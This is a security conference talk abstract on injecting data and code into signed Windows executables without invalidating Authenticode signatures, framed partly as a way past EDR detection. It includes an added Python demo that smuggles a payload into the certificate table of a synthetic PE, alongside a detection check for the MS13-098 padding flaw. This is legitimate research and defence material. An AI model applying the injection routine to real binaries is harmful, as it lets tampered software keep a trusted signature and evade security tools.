Could a signed Windows executable be modified without breaking the signature? Everyone told me “no”, so I built a set of tools that does exactly that. Let's talk Authenticode, PE/COFF and the limitations that allow one to inject data and code without breaking signatures or triggering Defender and EDR warnings. Then, see what you can do with that “feature”.
Description:
The ability to inject custom code and data into signed executables can help bypass detection, as EDRs consider properly signed code to be low risk. Such executables can be used to hide data in plain sight, while developers can use the same technique to build secure products that simplify the user experience, for example by shipping a single signed executable and adding configuration parameters to it after signing.
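The abstract does not say which PE/COFF limitations the speakers' tools rely on, so the following is an added illustration, not their code and not a description of their tooling. It demonstrates one property of the Authenticode PE hashing procedure that is documented by Microsoft: the hash skips the CheckSum field, the Security data directory entry and the attribute certificate table itself, while any other bytes after the sections are covered. Bytes placed inside the WIN_CERTIFICATE entry after the PKCS#7 blob therefore do not change the hash, whereas bytes simply appended to the end of the file do. The PE image below is a constructed, section-less PE32+ with a fake certificate blob; all function names are this example's own, and nothing is verified against real Windows APIs.

```python
"""Added example: which bytes of a PE file the Authenticode hash covers.

Constructed, self-contained demo. The image built here is a synthetic PE32+
with no sections and a fake certificate table; nothing is really signed.
"""
import hashlib
import struct

FILE_ALIGN = 0x200
SECURITY_DIR = 4  # IMAGE_DIRECTORY_ENTRY_SECURITY


def _layout(pe: bytes) -> dict:
    """Offsets the Authenticode hash procedure needs (PE32 and PE32+)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    ddir = 112 if magic == 0x20B else 96  # data directory start inside the optional header
    return {
        "num_sections": num_sections,
        "sections": opt + opt_size,                      # first IMAGE_SECTION_HEADER
        "size_of_headers": struct.unpack_from("<I", pe, opt + 60)[0],
        "checksum": opt + 64,                            # excluded from the hash
        "secdir": opt + ddir + 8 * SECURITY_DIR,         # excluded from the hash
    }


def build_minimal_pe(cert_blob: bytes) -> bytes:
    """Constructed PE32+: DOS header, headers padded to FILE_ALIGN, then one
    WIN_CERTIFICATE (dwLength, wRevision 0x0200, type 0x0002 PKCS#7) holding cert_blob."""
    table = bytearray(struct.pack("<IHH", 0, 0x0200, 0x0002)) + cert_blob
    table += b"\0" * (-len(table) % 8)           # entries are 8-byte aligned
    struct.pack_into("<I", table, 0, len(table))  # dwLength
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)         # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)  # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)   # Section/File alignment
    struct.pack_into("<II", opt, 56, 0x1000, FILE_ALIGN)   # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 3)            # IMAGE_SUBSYSTEM_WINDOWS_CUI
    struct.pack_into("<I", opt, 108, 16)          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * SECURITY_DIR, FILE_ALIGN, len(table))
    headers = dos + b"PE\0\0" + coff + opt
    headers += b"\0" * (FILE_ALIGN - len(headers))
    return bytes(headers + table)


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Hash per the Authenticode PE spec: headers minus CheckSum and the Security
    directory entry, sections in file order, then trailing data minus the
    certificate table. (CheckSum is not recomputed here; it is outside the hash.)"""
    lay = _layout(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, lay["secdir"])
    h = hashlib.new(algo)
    h.update(pe[: lay["checksum"]])
    h.update(pe[lay["checksum"] + 4 : lay["secdir"]])
    h.update(pe[lay["secdir"] + 8 : lay["size_of_headers"]])
    hashed = lay["size_of_headers"]
    spans = []
    for i in range(lay["num_sections"]):
        raw_size, raw_ptr = struct.unpack_from("<II", pe, lay["sections"] + 40 * i + 16)
        if raw_size:
            spans.append((raw_ptr, raw_size))
    for raw_ptr, raw_size in sorted(spans):
        h.update(pe[raw_ptr : raw_ptr + raw_size])
        hashed += raw_size
    if cert_size:   # everything after the sections is covered except the table itself
        h.update(pe[hashed:cert_off])
        h.update(pe[cert_off + cert_size :])
    else:
        h.update(pe[hashed:])
    return h.hexdigest()


def inject_into_cert_table(pe: bytes, payload: bytes) -> bytes:
    """Grow the single WIN_CERTIFICATE so payload rides after the PKCS#7 blob.
    Only dwLength and the Security directory Size change, both outside the hash."""
    lay = _layout(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, lay["secdir"])
    table = bytearray(pe[cert_off : cert_off + cert_size]) + payload
    table += b"\0" * (-len(table) % 8)
    struct.pack_into("<I", table, 0, len(table))
    out = bytearray(pe[:cert_off]) + table + pe[cert_off + cert_size :]
    struct.pack_into("<II", out, lay["secdir"], cert_off, len(table))
    return bytes(out)


def cert_table_slack(pe: bytes) -> bytes:
    """Bytes inside WIN_CERTIFICATE beyond the DER length of the PKCS#7 SignedData.
    A normal signer leaves at most 7 zero bytes here; non-zero slack is what the
    opt-in MS13-098 (CVE-2013-3900) padding check in WinVerifyTrust rejects."""
    lay = _layout(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, lay["secdir"])
    body = pe[cert_off + 8 : cert_off + cert_size]
    if body[0] != 0x30:
        raise ValueError("certificate body is not a DER SEQUENCE")
    first = body[1]
    if first & 0x80:                      # long-form DER length
        n = first & 0x7F
        der_len = 2 + n + int.from_bytes(body[2 : 2 + n], "big")
    else:
        der_len = 2 + first
    return body[der_len:]


if __name__ == "__main__":
    FAKE_PKCS7 = b"\x30\x82\x00\x3e" + b"A" * 62   # constructed stand-in for SignedData
    pe = build_minimal_pe(FAKE_PKCS7)
    signed_hash = authenticode_hash(pe)
    smuggled = inject_into_cert_table(pe, b"mode=verbose;endpoint=example.invalid")
    print(authenticode_hash(smuggled) == signed_hash)   # unchanged: signature still matches
    print(authenticode_hash(pe + b"X") == signed_hash)  # changed: bytes after the table are hashed
    print(cert_table_slack(smuggled))
```

Two practitioner notes. First, the smuggled bytes are detectable without breaking any signature: the DER length of the PKCS#7 blob is smaller than dwLength, which is exactly the padding check Windows added in MS13-098 (CVE-2013-3900); it is disabled by default and enabled through the EnableCertPaddingCheck registry value under HKLM\Software\Microsoft\Cryptography\Wintrust\Config, so a verification pipeline that wants to reject such files has to turn it on or implement the same check itself, as `cert_table_slack` does. Second, the example only covers data smuggling; whether any embedded code gets executed depends entirely on the host executable reading its own certificate table, which the signature does nothing to prevent or enable.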
About the speakers
Alex Ivkin leads a solutions group at Eclypsium, a US security startup. His focus is on researching secure deployments of (in)secure software, including container orchestration, application security, and firmware security. Alex has two decades of security evaluation experience, has delivered security training, holds an MS in Computer Science, co-authored security certifications and climbs mountains in his spare time.
Alexei Kojenov began his career as a software developer. A decade later, he realized that breaking code was far more fun than writing it, and decided to switch direction. He is now a full-time application security professional with extensive experience assisting engineering teams in delivering secure code, currently working for Google. Outside his day job, Alexei enjoys doing security research and speaking at various conferences.